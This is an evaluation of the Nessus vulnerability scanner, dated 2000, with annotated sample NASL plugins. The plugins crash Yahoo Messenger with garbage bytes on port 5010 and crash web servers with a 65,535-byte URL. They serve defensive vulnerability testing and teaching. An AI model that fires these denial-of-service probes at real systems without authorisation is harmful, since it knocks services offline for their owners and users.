Nessus

Summary

Nessus is a network security scanner based on a proprietary scripting language, NASL, designed to simplify vulnerability detection.

Nessus is a fully featured, easily extendable, frequently updated security scanner. Its vulnerabilities detection is done entirely by external NASL scripts and small C programs. This sort of plugin architecture is probably its biggest advantage over other security scanners. When new vulnerabilites are found, a new NASL script to detect/exploit it could be written and added to Nessus' vulnerabilities database. Also, the Nessus website has a database of scripts that is updated daily; the Nessus package includes a program to automatically update its local script database from the central one, a very useful feature.

URL: http://www.nessus.org

Notes

Pros:

• the central vulnerabilties database is updated on a daily basis
• the user can extend Nessus' vulnerabilites database relatively easily
• NASL scripts are concise and easy to make and learn from
• it does not make assumptions based on port numbers or version numbers
• well documented
• it is free, which is surprising given the overall quality of project
• often offers solutions to fix a vulnerability
• if a vulnerability is exploitable through the network, a NASL script could be written to exploit it in most cases.

Cons:

• to write scripts requires learning NASL, a proprietary scripting language that will probably only be useful in Nessus. --> learning curve partially offset by many examples to learn from and good documentation.

Rating: Highly recommended, especially for administrators who can keep it up-to-date and code their own tests.

Classification

• Static or dynamic: dynamic
• Modified library or instrumenting: N/A
• Testing or production env: production
• Opaque or clear or cloudy view of the system: opaque
• List-based or heuristic: list-based
• Conservative or liberal: conservative mostly but it depends on each individual script
• Concurrent or stand-alone: stand-alone mostly, depends on each script
• Alert or advice: advice often

Sample NASL scripts (commentary is between "(*" and "*)" marks)

#

# This script was written by Noam Rathaus 

#

# See the Nessus Scripts License for details

#

#



(* This section is for the user's benefit.  This is the information

about the vulnerability being tested for. *)



if(description)

{



(* script_id is the ID # of this script in the central Nessus script

database *)

 script_id(10326);



(* this line indicates how this vulnerability is classified in the CVE

datebase *)

 script_cve_id("CAN-2000-0047");

 

(* A human readable description of the vulnerability being tested for *)

 name["english"] = "Yahoo Messenger Denial of Service attack";

 script_name(english:name["english"]);

 

desc["english"] = "It is possible to cause Yahoo Messenger to crash by sending a few bytes

of garbage into its listening port TCP 5010.



Solution: Block those ports from outside communication



Risk factor : Low";



 script_description(english:desc["english"]);

 

 summary["english"] = "Yahoo Messenger Denial of Service attack";

 script_summary(english:summary["english"]);

 

 script_category(ACT_DENIAL);

 

 script_copyright(english:"This script is Copyright (C) 1999 SecuriTeam");

 family["english"] = "Denial of Service";

 family["francais"] = "Déni de service";

 script_family(english:family["english"], francais:family["francais"]);

 script_require_ports(5010);

 

 exit(0);

}



#

# The script code starts here

#



(* Open port 5010 on the machine being tested... *)



if (get_port_state(5010))

{

 sock5010 = open_sock_tcp(5010);



(* If the open was successful... *)

 if (sock5010)

 {



(* ... then send 2048 bytes of random data (the crap function) and close

the socket *)

  send(socket:sock5010, data:crap(2048));

  close(sock5010);



(* then wait... *)



  sleep(5);



(* test if the port is still accepting connections.  If yes, just warn

the user that the Yahoo Messenger is running... no big deal.  If no, 

then the vulnerability exists on this machine *)

  sock5010_sec = open_sock_tcp(5010);

  if (sock5010_sec)

  {

   security_warning(port:5010, data:"Yahoo Listening port is open.");

  }

  else

  {

   security_hole(port:5010);

  }

 }

}



(************ end of the Yahoo script *************)











#

# This script was written by Renaud Deraison 

#

# See the Nessus Scripts License for details

#





if(description)

{



(* the script ID in the master Nessus script database *)

 script_id(10320);

 



(* Begin the multilingual description *)

 name["english"] = "Too long URL";

 name["francais"] = "URL trop longue";

 script_name(english:name["english"], francais:name["francais"]);

 

 desc["english"] = "

It may be possible to make a web server execute

arbitrary code by sending it a too long url. 



Risk factor : High



Solution : Upgrade your web server.";



 desc["francais"] = "

 

Il est peut etre possible de faire executer du code arbitraire

à un serveur web en lui envoyant une URL trop longue.



Facteur de risque : Elevé



Solution : Mettez à jour votre serveur web.";





 script_description(english:desc["english"], francais:desc["francais"]);

 

 summary["english"] = "Web server buffer overflow";

 summary["francais"] = "Dépassement de buffer dans un serveur web";

 script_summary(english:summary["english"], francais:summary["francais"]);



(* Specify what effect the vulnerability that is being tested for 

causes *) 

 script_category(ACT_DENIAL);

 

 

 script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",

		francais:"Ce script est Copyright (C) 1999 Renaud Deraison");

 family["english"] = "Gain root remotely";

 family["francais"] = "Passer root à distance";

 script_family(english:family["english"], francais:family["francais"]);



(* Tell Nessus that running this script is dependent on the results

of find_service.nes (it determines what services are running on which

ports.  If either port 80 is open or a web server is running, this script

is runnable.  If not, there is no point in running this script.  It's

a time saver. *) 

 script_dependencie("find_service.nes");

  script_require_ports("Services/www",80);

 exit(0);

}



#

# The script code starts here

#



(* get the web server's port *)

port = get_kb_item("Services/www");



(* if find_service.nes didn't find a web server, try the default web

server port 80 *)

if(!port)port = 80;





(* try to open the port *)

soc = open_sock_tcp(port);



(* if the open failed, exit, no point in continuing *)

if(!soc)exit(0);



(* ... otherwise, send a really long HTTP request to the web server *)

req = string("GET /", crap(65535), "\r\n");

send(socket:soc, data:req);

close(soc);



(* ... and wait one second *)



sleep(1);





(* Now see if the web server is still running or not. *)

soc2 = open_sock_tcp(port);



(* If the port is no longer open, the server has the vulnerability *)

if(!soc2){

	security_hole(port);

	set_kb_item(name:"www/too_long_url_crash", value:TRUE);

	exit(0);

	}



(* If the port is still open, send a valid request to see if the

server is still ... lucid *)

req = string("GET / HTTP/1.0\r\n\r\n");

send(socket:soc2, data:req);

r = recv(socket:soc2, length:1024);

close(soc);





(* if the server didn't send a response to the valid HTTP request,

the server has the vulnerability.  Make note of it. *)

if(!r){

	security_hole(port);

	set_kb_item(name:"www/too_long_url_crash", value:TRUE);

      }





(************ end of the script *************)

Evaluated by Patrick LeBlanc on 7-17-00